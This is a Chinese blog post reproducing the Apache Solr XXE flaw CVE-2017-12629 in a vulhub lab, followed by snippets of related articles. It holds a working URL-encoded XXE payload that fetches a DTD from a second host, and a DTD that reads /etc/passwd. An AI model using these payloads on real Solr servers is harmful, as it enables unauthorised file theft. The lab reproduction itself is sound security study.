[漏洞复现] Apache Solr XXE(CVE-2017-12629)

最新推荐文章于 2024-03-31 20:41:05 发布
最新推荐文章于 2024-03-31 20:41:05 发布
阅读量1.2k 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41918771/article/details/117778442
版权

前言

什么是Lucene

Lucene 是一个高效的,基于 Java 的全文检索库。 Lucene 是 apache 软件基金会 4 jakarta 项目组的一个子项目,是一个开放源代码的全 文检索引擎工具包,但它不是一个完整的全文检索引擎,而是一个全文检索引擎的架构,
Lucene主要提供了一个简单、强大的应用程序接口。

什么是solr

Solr 是基于 Lucene 的面向企业搜索的 web 应用 ,Solr 是一个独立的企业级搜索应用服务器。它对外提供类似于 Web-service 的 API 接 口。用户可以通过 http 请求,向搜索引擎服务器提交一定格式的 XML 文件,生成索引;也 可以通过 Http Get 操作提出查找请求,并得到 xml/json 格式的返回结果。

注意是Solr来提供的http服务,Lucene不提供,他是一个应用程序接口。
并且Solr对Lucene进行了扩展。提供了一个完善的功能管理界面,是一款非常优秀的全文检索引擎。

影响版本

Apache Solr < 7.1
Apache Lucene < 7.1

环境搭建

cd /opt/vulhub/solr/CVE-2017-12629-XXE
docker-compose up -d

在这里插入图片描述

漏洞复现

访问http://192.168.1.7:8983/solr/admin/cores,查看有哪些core。如下图
可以看到有个core名字为demo。
在这里插入图片描述

构造payload

http://192.168.1.7:8983/solr/demo/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2F192.168.1.67%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser&wt=xml&defType=xmlparser

造成Blind XXE
在这里插入图片描述

利用Error Based XXE读取文件:

首先创建一个1.dtd,内容如下

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">

将payload进行url编码

<?xml version="1.0" ?><!DOCTYPE root[<!ENTITY % ext SYSTEM "http://192.168.1.67/1.dtd">%ext;%ent;]><r>&data;</r>

在这里插入图片描述

成功读取文件
在这里插入图片描述

Vicl1fe
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
从buuctf 简单学习xxe
m0_46580995的博客
11-08 1214
buuctf 抓包发可以xxe payload <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE hack [ <!ENTITY file SYSTEM "file://文件"> ]> <user> <username>&file;</username> <password>hack</password> </user&g
Apache Solr 远程命令执行漏洞CVE-2017-12629)
weixin_45022281的博客
10-13 2531
Apache Solr 远程命令执行漏洞CVE-2017-12629) 漏洞描述: 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。此次漏洞Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。 风险
CVE-2017-12629 xxe漏洞
xinyue9966的博客
03-21 1102
一、实验介绍 1.漏洞介绍 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE)。 2.影响版本 Apache Solr before 7.1 with Apache Lucene before 7.1 E
CVE-2017-12629:Apache Solr XXE&&RCE
qq_61553520的博客
05-13 891
pache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE)。漏洞影响版本:Apache Solr before 7.1 with Apache Lucene before 7.1。
Apache solr xxe漏洞CVE-2017-12629)
whojoe的博客
07-06 1934
Apache solr xxe漏洞CVE-2017-12629)前言环境搭建漏洞参考文章 前言 影响版本 Apache Solr < 7.1 Apache Lucene < 7.1 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/solr/CVE-2017-12629-X
solr XML外部实体注入(CVE-2017-12629-xxe)
hackzkaq的博客
12-22 135
一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2017-12629环境2、启动CVE-2017-12629环境3、查看CVE-2017-12629环境4、访问CVE-2017-12629环境5、查看CVE-2017-12629漏洞提示信息6、关闭CVE-2017-12629环境五、漏洞1、查看core2、Dnslog检测漏洞是否存在1.获取域名2.构造payload并执行3.漏洞存在3、读取/etc/passwd文件1.构造xml文件。
Apache solr XXE 漏洞CVE-2017-12629)
m0_73605862的博客
12-01 887
(排查了端口被占的问题,发是可以打开目录的,是因为防火墙没关,后面关了就可以了)5.然后要用到另一个服务器上面的dtd文件,所以这里需要用http-server搭建一个服务器,先开放一个端口,然后在共享文件夹里面写入一个1.dtd。3.进入到核心的查看界面,是json的查看方式,第二张的表达方式会更直观,可以看到xxe漏洞在哪里,在那个demo那个地方。2.开始看wp的时候没有看懂为什么是core,然后去了解了一下solr的核心这个概念,然后发是一个启动的配置。然后就出来了etc/passwd。
Apache Solrsolr-8.11.1-src.tgz)
01-10
标题中的"solr-8.11.1-src.tgz"表明这是Apache Solr 8.11.1版本的源代码包,适用于那些希望对Solr进行深度定制或开发的用户。 源代码发布通常包含了编译和构建Solr所需的所有文件,包括Java源代码、配置文件、测试...
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
Apache Solrsolr-8.11.1.zip)
01-10
Solr-8.11.1是该软件的一个特定版本,包含了从早期版本到8.11.1的所有改进和修。 在"solr-8.11.1.zip"这个压缩包中,用户可以找到Solr的核心组件和必要的配置文件,以便在本地或服务器上快速部署和运行。以下是对...
apache-solr-dataimportscheduler-1.0.zip_official54l_solr 5.x定时生成
09-24
"apache-solr-dataimportscheduler-1.0.zip"是一个官方发布的54l版本,专门针对Solr 5.x的定时索引生成需求。 数据导入调度器(DataImportScheduler)是这个扩展的核心组件,它允许用户根据预设的时间间隔自动执行...
Apache Solr 远程命令+XXE执行漏洞CVE-2017-12629)
ddr12231的博客
08-09 715
Apache Solr 最近有出了个漏洞预警,先习一下之前的漏洞 命令执行 先创建一个listener,其中设置exe的值为我们想执行的命令,args的值是命令参数 POST /solr/demo/config HTTP/1.1 Host: your-ip Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatib...
apache-solr XXE漏洞
weixin_48776804的博客
07-26 485
apache-solr XXE漏洞
Apache solr XML 实体注入漏洞CVE-2017-12629)
EC_Carrot的博客
07-29 489
漏洞简介 Apache Solr 是一个开源的搜索服务器。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 参考了这位大佬的文章:https://www.cnblogs.com/cute-puli/p/13340249.html 漏洞 这个漏洞需要搭建一个http,我这里用的python3 -m http.server 8000 然后在该网站目录下创建一个.dtd文件,内容为: <!E
Apache Solr 远程命令执行漏洞 CVE-2017-12629 漏洞
ADummy的博客
02-27 337
Apache Solr 远程命令执行漏洞CVE-2017-12629) by ADummy 0x00利用路线 ​ Burpsuite发送两个包,一个listener,一个update—>命令执行 0x01漏洞介绍 ​ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实。此次7.1.0之
【vulhub】Apache Solr 远程命令执行漏洞CVE-2017-12629)
qq_45300786的博客
09-15 1316
特征 访问8983端口即可查看到Apache solr的管理页面,无需登录。(可能换端口) 网站title是Solr Admin,图标有点像一朵红色的花 影响版本 Apache Solr 5.5.0到7.0.1版本 漏洞利用 此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 https://paper.seebug.org/425/ 这里我看了下vulhub官方的文档,首先创建一个listener
vulhub中Apache Solr 远程命令执行漏洞CVE-2017-12629)
最新发布
yougexiaojiuguan的博客
03-31 522
漏洞过程的记录
[漏洞]Mysql 身份认证绕过漏洞CVE-2012-2122)
Vicl1fe的博客
12-24 3231
mysql身份验证绕过漏洞这个漏洞
cve-2022-23222
04-28
CVE-2022-23222是一个相关于Apache Solr漏洞,恶意攻击者通过该漏洞可以导致Solr服务拒绝响应或服务中断。要这个漏洞,需要进行以下操作: 1. 安装并配置Apache Solr服务; 2. 发送一个HTTP请求,其中查询参数需要包含一个bad中的特殊字符,例如'() {内网IP地址}'; 3. Solr服务将无法识别该特殊字符并将停止响应,此时攻击者便可以利用这个漏洞进行攻击。 需要注意的是,为了成功漏洞,需要具备一定的技术水平。同时,攻击者在进行测试时需要谨慎,以免对目标服务器造成不必要的损失。 为了避免该漏洞对系统造成影响,建议及时更新Solr服务程序,升级至最新版本。如果您发自己的系统已经受到攻击,应立即断开与互联网的连接,并及时咨询安全专业人员解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vicl1fe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值